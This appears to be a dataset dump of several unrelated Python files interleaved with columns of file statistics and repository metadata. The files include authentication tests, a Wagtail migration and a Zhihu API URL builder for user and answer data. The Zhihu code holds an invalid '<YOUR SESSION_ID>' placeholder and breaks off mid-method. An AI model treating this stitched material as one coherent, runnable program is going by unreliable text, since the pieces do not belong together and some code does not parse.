reply = auth_api.CompleteSignup(
auth_pb2.CompleteSignupReq(
signup_token=signup_token,
username="frodo",
name="Räksmörgås",
city="Minas Tirith",
birthdate="1980-12-31",
gender="Robot",
hosting_status=api_pb2.HOSTING_STATUS_CAN_HOST,
lat=1,
lng=1,
radius=100,
accept_tos=True,
)
)
with auth_api_session() as (auth_api, metadata_interceptor):
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.Authenticate(auth_pb2.AuthReq(user=testing_email, password="password"))
assert e.value.code() == grpc.StatusCode.FAILED_PRECONDITION
assert e.value.details() == errors.NO_PASSWORD
def test_successful_login(db):
user, _ = generate_user()
# Valid email login
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Login(auth_pb2.LoginReq(user=user.email))
assert reply.next_step == auth_pb2.LoginRes.LoginStep.NEED_PASSWORD
# Valid username login
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Login(auth_pb2.LoginReq(user=user.username))
assert reply.next_step == auth_pb2.LoginRes.LoginStep.NEED_PASSWORD
def test_unsuccessful_login(db):
# Invalid email, user doesn't exist
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Login(auth_pb2.LoginReq(user=f"{random_hex(12)}@couchers.org.invalid"))
assert reply.next_step == auth_pb2.LoginRes.LoginStep.INVALID_USER
# Invalid id
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Login(auth_pb2.LoginReq(user="-1"))
assert reply.next_step == auth_pb2.LoginRes.LoginStep.INVALID_USER
# Invalid username
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Login(auth_pb2.LoginReq(user="notarealusername"))
assert reply.next_step == auth_pb2.LoginRes.LoginStep.INVALID_USER
testing_email = f"{random_hex(12)}@couchers.org.invalid"
# No Password
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Signup(auth_pb2.SignupReq(email=testing_email))
with session_scope() as session:
entry = session.query(SignupToken).filter(SignupToken.email == testing_email).one()
signup_token = entry.token
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.CompleteSignup(
auth_pb2.CompleteSignupReq(
signup_token=signup_token,
username="frodo",
name="Räksmörgås",
city="Minas Tirith",
birthdate="1980-12-31",
gender="Robot",
hosting_status=api_pb2.HOSTING_STATUS_CAN_HOST,
lat=1,
lng=1,
radius=100,
accept_tos=True,
)
)
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Login(auth_pb2.LoginReq(user=testing_email))
assert reply.next_step == auth_pb2.LoginRes.LoginStep.SENT_LOGIN_EMAIL
def test_complete_signup(db):
testing_email = f"{random_hex(12)}@couchers.org.invalid"
with auth_api_session() as (auth_api, metadata_interceptor):
reply = auth_api.Signup(auth_pb2.SignupReq(email=testing_email))
with session_scope() as session:
entry = session.query(SignupToken).filter(SignupToken.email == testing_email).one()
signup_token = entry.token
with auth_api_session() as (auth_api, metadata_interceptor):
# Invalid username
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.CompleteSignup(
auth_pb2.CompleteSignupReq(
signup_token=signup_token,
username=" ",
name="Räksmörgås",
city="Minas Tirith",
birthdate="1980-12-31",
gender="Robot",
hosting_status=api_pb2.HOSTING_STATUS_CAN_HOST,
lat=1,
lng=1,
radius=100,
accept_tos=True,
)
)
assert e.value.code() == grpc.StatusCode.INVALID_ARGUMENT
assert e.value.details() == errors.INVALID_USERNAME
with auth_api_session() as (auth_api, metadata_interceptor):
# Invalid name
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.CompleteSignup(
auth_pb2.CompleteSignupReq(
signup_token=signup_token,
username="frodo",
name=" ",
city="Minas Tirith",
birthdate="1980-12-31",
gender="Robot",
hosting_status=api_pb2.HOSTING_STATUS_CAN_HOST,
lat=1,
lng=1,
radius=100,
accept_tos=True,
)
)
assert e.value.code() == grpc.StatusCode.INVALID_ARGUMENT
assert e.value.details() == errors.INVALID_NAME
with auth_api_session() as (auth_api, metadata_interceptor):
# Hosting status required
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.CompleteSignup(
auth_pb2.CompleteSignupReq(
signup_token=signup_token,
username="frodo",
name="Frodo",
city="Minas Tirith",
birthdate="1980-12-31",
gender="Robot",
hosting_status=None,
lat=1,
lng=1,
radius=100,
accept_tos=True,
)
)
assert e.value.code() == grpc.StatusCode.INVALID_ARGUMENT
assert e.value.details() == errors.HOSTING_STATUS_REQUIRED
user, _ = generate_user()
with auth_api_session() as (auth_api, metadata_interceptor):
# Username unavailable
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.CompleteSignup(
auth_pb2.CompleteSignupReq(
signup_token=signup_token,
username=user.username,
name="Frodo",
city="Minas Tirith",
birthdate="1980-12-31",
gender="Robot",
hosting_status=api_pb2.HOSTING_STATUS_CAN_HOST,
lat=1,
lng=1,
radius=100,
accept_tos=True,
)
)
assert e.value.code() == grpc.StatusCode.INVALID_ARGUMENT
assert e.value.details() == errors.USERNAME_NOT_AVAILABLE
with auth_api_session() as (auth_api, metadata_interceptor):
# Invalid coordinate
with pytest.raises(grpc.RpcError) as e:
reply = auth_api.CompleteSignup(
auth_pb2.CompleteSignupReq(
signup_token=signup_token,
username="frodo",
name="Frodo",
city="Minas Tirith",
birthdate="1980-12-31",
gender="Robot",
hosting_status=api_pb2.HOSTING_STATUS_CAN_HOST,
lat=0,
lng=0,
radius=100,
accept_tos=True,
)
)
assert e.value.code() == grpc.StatusCode.INVALID_ARGUMENT
assert e.value.details() == errors.INVALID_COORDINATE
# CompleteChangeEmail tested in test_account.py
| 39.045455
| 114
| 0.646017
| 2,797
| 24,052
| 5.294601
| 0.086879
| 0.077993
| 0.051995
| 0.065636
| 0.850901
| 0.839895
| 0.823013
| 0.809575
| 0.783713
| 0.770275
| 0
| 0.014254
| 0.259147
| 24,052
| 615
| 115
| 39.108943
| 0.816825
| 0.041078
| 0
| 0.67679
| 0
| 0
| 0.042515
| 0.010379
| 0
| 0
| 0
| 0
| 0.130152
| 1
| 0.047722
| false
| 0.088937
| 0.021692
| 0.002169
| 0.071584
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
fe5d5cc5ee688eb8893125c2dfffc38956ebdf6d
| 5,215
|
py
|
Python
|
wtknowledgebase/migrations/0001_initial.py
|
skruger/wagtail-knowledgebase
|
cb92640b3394a14c75b3629f0582c8a070fddd95
|
[
"MIT"
] | 1
|
2021-05-03T23:52:09.000Z
|
2021-05-03T23:52:09.000Z
|
wtknowledgebase/migrations/0001_initial.py
|
skruger/wagtail-knowledgebase
|
cb92640b3394a14c75b3629f0582c8a070fddd95
|
[
"MIT"
] | null | null | null |
wtknowledgebase/migrations/0001_initial.py
|
skruger/wagtail-knowledgebase
|
cb92640b3394a14c75b3629f0582c8a070fddd95
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.10 on 2020-09-15 22:27
from django.db import migrations, models
import django.db.models.deletion
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.images.blocks
import wtknowledgebase.blocks
class Migration(migrations.Migration):
initial = True
dependencies = [
('wagtailcore', '0045_assign_unlock_grouppagepermission'),
]
operations = [
migrations.CreateModel(
name='KbArticlePage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('body', wagtail.core.fields.StreamField([('richtext', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('quote', wagtail.core.blocks.BlockQuoteBlock()), ('page', wagtail.core.blocks.PageChooserBlock()), ('card', wagtail.core.blocks.StructBlock([('header_title', wagtail.core.blocks.RichTextBlock(required=False)), ('card_classes', wagtail.core.blocks.CharBlock(help_text="Be sure to include 'card'", required=False)), ('card_header_classes', wagtail.core.blocks.CharBlock(help_text="Be sure to include 'card-header'", required=False)), ('card_body_classes', wagtail.core.blocks.CharBlock(help_text="Be sure to include 'card-body'", required=False)), ('body', wagtail.core.blocks.StreamBlock([('richtext', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('quote', wagtail.core.blocks.BlockQuoteBlock()), ('page', wagtail.core.blocks.PageChooserBlock())]))])), ('grid_row', wagtail.core.blocks.StructBlock([('class_name', wagtail.core.blocks.CharBlock(required=False)), ('cells', wagtail.core.blocks.ListBlock(wtknowledgebase.blocks.GridCellBlock))]))])),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='KbCategoryPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('body', wagtail.core.fields.StreamField([('richtext', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('quote', wagtail.core.blocks.BlockQuoteBlock()), ('page', wagtail.core.blocks.PageChooserBlock()), ('card', wagtail.core.blocks.StructBlock([('header_title', wagtail.core.blocks.RichTextBlock(required=False)), ('card_classes', wagtail.core.blocks.CharBlock(help_text="Be sure to include 'card'", required=False)), ('card_header_classes', wagtail.core.blocks.CharBlock(help_text="Be sure to include 'card-header'", required=False)), ('card_body_classes', wagtail.core.blocks.CharBlock(help_text="Be sure to include 'card-body'", required=False)), ('body', wagtail.core.blocks.StreamBlock([('richtext', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('quote', wagtail.core.blocks.BlockQuoteBlock()), ('page', wagtail.core.blocks.PageChooserBlock())]))])), ('grid_row', wagtail.core.blocks.StructBlock([('class_name', wagtail.core.blocks.CharBlock(required=False)), ('cells', wagtail.core.blocks.ListBlock(wtknowledgebase.blocks.GridCellBlock))]))])),
('category_name', models.CharField(max_length=250)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='KbIndexPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('body', wagtail.core.fields.StreamField([('richtext', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('quote', wagtail.core.blocks.BlockQuoteBlock()), ('page', wagtail.core.blocks.PageChooserBlock()), ('card', wagtail.core.blocks.StructBlock([('header_title', wagtail.core.blocks.RichTextBlock(required=False)), ('card_classes', wagtail.core.blocks.CharBlock(help_text="Be sure to include 'card'", required=False)), ('card_header_classes', wagtail.core.blocks.CharBlock(help_text="Be sure to include 'card-header'", required=False)), ('card_body_classes', wagtail.core.blocks.CharBlock(help_text="Be sure to include 'card-body'", required=False)), ('body', wagtail.core.blocks.StreamBlock([('richtext', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('quote', wagtail.core.blocks.BlockQuoteBlock()), ('page', wagtail.core.blocks.PageChooserBlock())]))])), ('grid_row', wagtail.core.blocks.StructBlock([('class_name', wagtail.core.blocks.CharBlock(required=False)), ('cells', wagtail.core.blocks.ListBlock(wtknowledgebase.blocks.GridCellBlock))]))])),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
]
| 94.818182
| 1,157
| 0.695302
| 568
| 5,215
| 6.290493
| 0.15669
| 0.153932
| 0.218864
| 0.087322
| 0.88553
| 0.88553
| 0.88553
| 0.88553
| 0.88553
| 0.860341
| 0
| 0.005083
| 0.132311
| 5,215
| 54
| 1,158
| 96.574074
| 0.78453
| 0.008821
| 0
| 0.574468
| 1
| 0
| 0.17844
| 0.007354
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.12766
| 0
| 0.212766
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
fe6d4a2c7f56ba72d9709cb34aa68b3b8caf93bd
| 130
|
py
|
Python
|
scCloud/scCloud/pipeline/__init__.py
|
broadinstitute/scRNA-Seq
|
03aafb92274a97f4d634ac9e42f0e0feca91ed98
|
[
"BSD-3-Clause"
] | 12
|
2019-04-08T11:39:33.000Z
|
2022-02-22T02:50:27.000Z
|
scCloud/scCloud/pipeline/__init__.py
|
broadinstitute/scRNA-Seq
|
03aafb92274a97f4d634ac9e42f0e0feca91ed98
|
[
"BSD-3-Clause"
] | null | null | null |
scCloud/scCloud/pipeline/__init__.py
|
broadinstitute/scRNA-Seq
|
03aafb92274a97f4d634ac9e42f0e0feca91ed98
|
[
"BSD-3-Clause"
] | 3
|
2019-03-06T20:44:33.000Z
|
2020-02-17T13:43:46.000Z
|
from .pipeline import run_pipeline
from .demuxEM_pipeline import run_demuxEM_pipeline
from .cite_seq import run_cite_seq_pipeline
| 32.5
| 50
| 0.884615
| 20
| 130
| 5.35
| 0.35
| 0.252336
| 0.317757
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092308
| 130
| 3
| 51
| 43.333333
| 0.90678
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
228ceae5c798d1cd4446a777e4f7fc43c18f0c7a
| 55
|
py
|
Python
|
pynet/__init__.py
|
iavr/pynet
|
09f3500e12a72c63699c74c34573539bfdc3ea12
|
[
"BSD-2-Clause"
] | 3
|
2019-12-11T15:09:58.000Z
|
2020-12-29T05:54:40.000Z
|
pynet/__init__.py
|
iavr/pynet
|
09f3500e12a72c63699c74c34573539bfdc3ea12
|
[
"BSD-2-Clause"
] | null | null | null |
pynet/__init__.py
|
iavr/pynet
|
09f3500e12a72c63699c74c34573539bfdc3ea12
|
[
"BSD-2-Clause"
] | null | null | null |
from lib import *
from lib import __
from net import *
| 13.75
| 18
| 0.745455
| 9
| 55
| 4.333333
| 0.444444
| 0.358974
| 0.666667
| 0.871795
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.218182
| 55
| 3
| 19
| 18.333333
| 0.906977
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
fe04bd177d7f393fbc34de7fb1eef6bedfd1122c
| 123
|
py
|
Python
|
test/test_convert.py
|
laashub-sua/demo-print
|
76665ffa6e3bd675ffa111ff6c3aabed9b5ea6ec
|
[
"Apache-2.0"
] | null | null | null |
test/test_convert.py
|
laashub-sua/demo-print
|
76665ffa6e3bd675ffa111ff6c3aabed9b5ea6ec
|
[
"Apache-2.0"
] | null | null | null |
test/test_convert.py
|
laashub-sua/demo-print
|
76665ffa6e3bd675ffa111ff6c3aabed9b5ea6ec
|
[
"Apache-2.0"
] | null | null | null |
import convert_pdf_2_jpg
if __name__ == '__main__':
convert_pdf_2_jpg.do_convert(r'files/test_convert_pdf_2_jpg.pdf')
| 24.6
| 69
| 0.804878
| 22
| 123
| 3.636364
| 0.545455
| 0.375
| 0.4125
| 0.525
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027027
| 0.097561
| 123
| 4
| 70
| 30.75
| 0.693694
| 0
| 0
| 0
| 0
| 0
| 0.325203
| 0.260163
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
fe08169c9104f05d4aa77d800165ac4a797401a5
| 31,241
|
py
|
Python
|
aiofetch/zhihu_APIs.py
|
ScottishFold007/zhihu_spider_aiofetch
|
6b316c5cd80283018f6c09904da2bf77ab0a68dc
|
[
"MIT"
] | 1
|
2020-02-26T15:12:48.000Z
|
2020-02-26T15:12:48.000Z
|
aiofetch/zhihu_APIs.py
|
ScottishFold007/zhihu_spider_aiofetch
|
6b316c5cd80283018f6c09904da2bf77ab0a68dc
|
[
"MIT"
] | null | null | null |
aiofetch/zhihu_APIs.py
|
ScottishFold007/zhihu_spider_aiofetch
|
6b316c5cd80283018f6c09904da2bf77ab0a68dc
|
[
"MIT"
] | null | null | null |
# !/usr/bin/env python3
# -*- coding: utf-8 -*-
# author : strangestring
# github : https://github.com/strangestring
import time
class ZhiHu:
def __init__(self):
"""
Core of zhihu API
"""
self.members = self._Members()
self.articles = self._Articles()
self.answers = self._Answers()
self.questions = self._Questions()
self.pins = self._Pins()
self.topics = self._Topics()
class _Members:
def __init__(self):
self.url_prefix = 'https://www.zhihu.com/api/v4/members'
def info(self, url_token, query_args=None):
"""
用户信息
:param url_token:
:param query_args:'allow_message','is_followed','is_following','description','is_org','is_blocking','employments','answer_count','follower_count','articles_count','gender','thanked_count','favorited_count','badge[?(type=best_answerer)].topics' ,etc.
:return:
"""
# global member_url_prefix
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}?{additional_query_items}'
else:
return f'{self.url_prefix}/{url_token}'
def followees(self, url_token, offset=0, limit=20, query_args=None):
"""
用户关注的人
:param url_token:
:param offset:
:param limit:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/followees?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{url_token}/followees?offset={offset}&limit={limit}'
def followers(self, url_token, offset=0, limit=20, query_args=None):
"""
用户的关注者
:param url_token:
:param offset:
:param limit:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/followers?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{url_token}/followers?offset={offset}&limit={limit}'
def activities(self, url_token, after_id=int(time.time()), limit=7,
session_id=<YOUR SESSION_ID>, query_args=None):
"""
Because of the high cost of obtaining full dynamics
asynchronously, it is recommended to use this method
only to determine the active state of the user in
a certain period of time
If you replace 'after_id with 'before_id'here
the effect is the same as after_id=int(time.time)
desktop=True seems have no effect
:param url_token:
:param after_id: another form of offset
:param session_id: each logged-in user has a unique session_id,please fill in your own uid above,you may construct your own session_id pool
:param limit:
:return:
"""
return f'{self.url_prefix}/{url_token}/activities?limit={limit}&session_id={session_id}&after_id={after_id}&desktop=True'
def pins(self, url_token, offset=0, limit=20, query_args=None):
"""
想法
:param url_token:
:param offset:
:param limit:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/pins?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{url_token}/pins?offset={offset}&limit={limit}'
def answers(self, url_token, offset=0, limit=20, sort_by='voteups',
query_args=None):
"""
回答
:param url_token:
:param offset:
:param limit:
:param sort_by:'voteups'/'created'
:param query_args:'is_normal','admin_closed_comment','reward_info',
'is_collapsed','annotation_action','annotation_detail','collapse_reason',
'collapsed_by','suggest_edit','comment_count','can_comment','content',
'voteup_count','reshipment_settings','comment_permission','mark_infos',
'created_time','updated_time','review_info','question','excerpt',
'is_labeled','label_info','relationship.is_authorized','voting',
'is_author','is_thanked','is_nothelp',
'is_recognized;data[*].author.badge[?(type=best_answerer)].topics'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/answers?{additional_query_items}&offset={offset}&limit={limit}&sort_by={sort_by}'
else:
return f'{self.url_prefix}/{url_token}/answers?offset={offset}&limit={limit}&sort_by={sort_by}'
def articles(self, url_token, offset=0, limit=20, sort_by='voteups',
query_args=None):
"""
文章
:param url_token:
:param offset:
:param limit:
:param sort_by:'voteups'/'created'
:param query_args:'comment_count','suggest_edit','is_normal',
'thumbnail_extra_info','thumbnail','can_comment','comment_permission',
'admin_closed_comment','content','voteup_count','created','updated',
'upvoted_followees','voting','review_info','is_labeled',
'label_info;data[*].author.badge[?(type=best_answerer)].topics'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/articles?{additional_query_items}&offset={offset}&limit={limit}&sort_by={sort_by}'
else:
return f'{self.url_prefix}/{url_token}/articles?offset={offset}&limit={limit}&sort_by={sort_by}'
def questions(self, url_token, offset=0, limit=20, query_args=None):
"""
提问
:param url_token:
:param offset:
:param limit:
:param query_args:'created','answer_count','follower_count','author',
'admin_closed_comment'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/questions?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{url_token}/questions?offset={offset}&limit={limit}'
def column_contributions(self, url_token, offset=0, limit=20,
query_args=None):
"""
专栏
:param url_token:
:param offset:
:param limit:
:param query_args:'column.intro','followers','articles_count'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/column-contributions?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{url_token}/column-contributions?offset={offset}&limit={limit}'
def favlists(self, url_token, offset=0, limit=20, query_args=None):
"""
收藏夹
:param url_token:
:param offset:
:param limit:
:param query_args:'updated_time','answer_count','follower_count','is_public'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/favlists?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{url_token}/favlists?offset={offset}&limit={limit}'
def following_columns(self, url_token, offset=0, limit=20,
query_args=None):
"""
关注的专栏
:param url_token:
:param offset:
:param limit:
:param query_args:'intro','followers','articles_count'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/following-columns?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{url_token}/following-columns?offset={offset}&limit={limit}'
def following_topic_contributions(self, url_token, offset=0, limit=20,
query_args=None, ):
"""
关注的话题(及在该话题下的回答数量(?))
:param url_token:
:param offset:
:param limit:
:param query_args: 'topic','introduction'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/following-topic-contributions?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{url_token}/following-topic-contributions?offset={offset}&limit={limit}'
def following_questions(self, url_token, offset=0, limit=20,
query_args=None):
"""
关注的问题
:param url_token:
:param offset:
:param limit:
:param query_args: 'created','answer_count','follower_count','author'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/following-questions?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{url_token}/following-questions?offset={offset}&limit={limit}'
def following_favlists(self, url_token, offset=0, limit=20,
query_args=None):
"""
关注的收藏夹
:param url_token:
:param offset:
:param limit:
:param query_args: 'updated_time','answer_count','follower_count'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/following-favlists?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{url_token}/following-favlists?offset={offset}&limit={limit}'
def marked_answers(self, url_token, offset=0, limit=20,
sort_by='voteups', query_args=None):
"""
被收录回答
:param url_token:
:param offset:
:param limit:
:param sort_by:
:param query_args:'is_normal','admin_closed_comment','reward_info',
'is_collapsed','annotation_action','annotation_detail','collapse_reason',
'collapsed_by','suggest_edit','comment_count','can_comment','content',
'voteup_count','reshipment_settings','comment_permission','mark_infos',
'created_time','updated_time','review_info','question','excerpt',
'is_labeled','label_info','relationship.is_authorized','voting',
'is_author','is_thanked','is_nothelp',
'is_recognized;data[*].author.badge[?(type=best_answerer)].topics'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/marked-answers?{additional_query_items}&offset={offset}&limit={limit}&sort_by={sort_by}'
else:
return f'{self.url_prefix}/{url_token}/marked-answers?offset={offset}&limit={limit}&sort_by={sort_by}'
def included_articles(self, url_token, offset=0, limit=20,
sort_by='voteups', query_args=None):
"""
被收录文章
:param url_token:
:param offset:
:param limit:
:param sort_by:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/included-articles?{additional_query_items}&offset={offset}&limit={limit}&sort_by={sort_by}'
else:
return f'{self.url_prefix}/{url_token}/included-articles?offset={offset}&limit={limit}&sort_by={sort_by}'
def mutuals(self, url_token, offset=0, limit=10, sort_by='voteups',
query_args=None):
"""
我的关注中也关注TA的人
:param url_token:
:param offset:
:param limit:
:param sort_by:
:param query_args:'answer_count','articles_count','gender','follower_count',
'is_followed','is_following','badge[?(type=best_answerer)].topics'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}/relations/mutuals?{additional_query_items}&offset={offset}&limit={limit}&sort_by={sort_by}'
else:
return f'{self.url_prefix}/{url_token}/relations/mutuals?offset={offset}&limit={limit}&sort_by={sort_by}'
class _Articles:
def __init__(self):
self.url_prefix = 'https://www.zhihu.com/api/v4/articles'
def info(self, url_token, query_args=None):
"""
:param url_token:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}?{additional_query_items}'
else:
return f'{self.url_prefix}/{url_token}'
def likers(self, article_id, offset=0, limit=20, query_args=None):
"""
up_voters
:param article_id:
:param offset:
:param limit:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{article_id}/likers?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{article_id}/likers?offset={offset}&limit={limit}'
def concerned_upvoters(self, article_id, query_args=None):
"""
我的关注中的点赞者
:param article_id:
:return:
"""
return f'{self.url_prefix}/{article_id}/concerned_upvoters'
def root_comments(
self,
article_id,
offset=0,
limit=20,
order='normal', query_args=None):
"""
结构化评论,建议仅在需要完整评论时使用.结果处理较麻烦
:param article_id:
:param offset:
:param limit:
:param order:
:return:
"""
return f'{self.url_prefix}/{article_id}/root_comments?limit={limit}&offset={offset}&order={order}&status=open'
def comments(self, article_id, offset=0, limit=20, order='reverse',
query_args=None):
"""
非结构化评论,'reverse'即'按时间排序'
:param article_id:
:param offset:
:param limit:
:param order:
:return:
"""
return f'{self.url_prefix}/{article_id}/root_comments?limit={limit}&offset={offset}&order={order}&status=open'
class _Answers:
def __init__(self):
self.url_prefix = 'https://www.zhihu.com/api/v4/answers'
def info(self, url_token, query_args=None):
"""
:param url_token:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{url_token}?{additional_query_items}'
else:
return f'{self.url_prefix}/{url_token}'
def voters(self, answer_id, offset=0, limit=10, query_args=None):
"""
点赞者
:param answer_id:
:param offset:
:param limit:
:param query_args: 'answer_count','articles_count','follower_count',
'gender','is_followed','is_following','badge'
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{answer_id}/voters?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{answer_id}/voters?offset={offset}&limit={limit}'
def concerned_upvoters(self, answer_id, offset=0, limit=20,
query_args=None):
"""
我的关注中的点赞者
:param answer_id:
:param offset:
:param limit:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{answer_id}/concerned_upvoters?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{answer_id}/concerned_upvoters?offset={offset}&limit={limit}'
def favlists(self, answer_id, offset=0, limit=20, query_args=None):
"""
收录该回答的收藏夹
:param answer_id:
:param offset:
:param limit:
:param query_args:
:return:
"""
if query_args:
additional_query_items = f'include=data[*].{",".join(query_args)}'
return f'{self.url_prefix}/{answer_id}/favlists?{additional_query_items}&offset={offset}&limit={limit}'
else:
return f'{self.url_prefix}/{answer_id}/favlists?offset={offset}&limit={limit}'
def root_comments(
self,
answer_id,
offset=0,
limit=20,
order='normal',
query_args=None):
"""
结构化评论,建议仅在需要完整评论时使用.结果处理较麻烦
:param answer_id:
:param offset:
:param limit:
:param order:
:return:
"""
